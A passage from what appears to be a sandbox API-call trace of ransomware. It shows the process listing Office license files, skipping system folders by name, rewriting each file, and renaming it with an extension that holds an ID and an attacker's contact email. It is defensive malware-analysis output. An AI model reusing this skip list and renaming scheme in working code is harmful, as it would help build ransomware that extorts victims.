hHeap=0x1e0000) returned 1 [0104.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0104.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest2-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0104.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest2-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0104.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0104.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0104.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0104.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0104.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.822] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11179) returned 1 [0104.822] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0104.822] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.829] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.829] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.830] CloseHandle (hObject=0x45c) returned 1 [0104.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0104.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0104.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0104.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0104.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0104.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0104.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.830] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0104.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0104.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0104.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.831] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5b6e14c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5b6e14c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5c52f59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a5e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTest2-ppd.xrm-ms", cAlternateFileName="O3F44A~1.XRM")) returned 1 [0104.831] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ppd.xrm-ms", lpString2=".") returned 1 [0104.831] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ppd.xrm-ms", lpString2="..") returned 1 [0104.831] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ppd.xrm-ms", lpString2="...") returned 1 [0104.831] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ppd.xrm-ms", lpString2="windows") returned -1 [0104.831] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.831] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.831] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.831] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.831] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.831] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0104.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest2-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest2-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0104.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest2-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest2-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0104.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0104.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0104.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.832] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23134) returned 1 [0104.832] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a50) returned 0x24c1d0 [0104.832] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5a50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5a50, lpOverlapped=0x0) returned 1 [0104.835] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.835] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5a50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5a50, lpOverlapped=0x0) returned 1 [0104.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.836] CloseHandle (hObject=0x45c) returned 1 [0104.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0104.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0104.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0104.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0104.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0104.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0104.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.836] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0104.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0104.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0104.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.837] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5b47f19, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5b47f19, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5c2ccf4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTest2-ul-oob.xrm-ms", cAlternateFileName="O3149B~1.XRM")) returned 1 [0104.837] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.837] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.837] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.837] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.837] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.837] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.837] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.837] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.837] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.837] lstrcmpiW (lpString1="O365HomePremR_SubTest2-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0104.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest2-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0104.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest2-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0104.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0104.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0104.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest2-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0104.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest2-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0104.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0104.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0104.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0104.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0104.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.838] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11630) returned 1 [0104.838] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0104.838] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0104.841] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.841] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0104.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.842] CloseHandle (hObject=0x45c) returned 1 [0104.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0104.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0104.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0104.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0104.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0104.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0104.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.842] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0104.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0104.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0104.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.843] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5b94335, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5b94335, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5c791bb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTest3-pl.xrm-ms", cAlternateFileName="O33C81~1.XRM")) returned 1 [0104.843] lstrcmpiW (lpString1="O365HomePremR_SubTest3-pl.xrm-ms", lpString2=".") returned 1 [0104.843] lstrcmpiW (lpString1="O365HomePremR_SubTest3-pl.xrm-ms", lpString2="..") returned 1 [0104.843] lstrcmpiW (lpString1="O365HomePremR_SubTest3-pl.xrm-ms", lpString2="...") returned 1 [0104.843] lstrcmpiW (lpString1="O365HomePremR_SubTest3-pl.xrm-ms", lpString2="windows") returned -1 [0104.843] lstrcmpiW (lpString1="O365HomePremR_SubTest3-pl.xrm-ms", lpString2="recovery") returned -1 [0104.843] lstrcmpiW (lpString1="O365HomePremR_SubTest3-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.843] lstrcmpiW (lpString1="O365HomePremR_SubTest3-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.843] lstrcmpiW (lpString1="O365HomePremR_SubTest3-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.844] lstrcmpiW (lpString1="O365HomePremR_SubTest3-pl.xrm-ms", 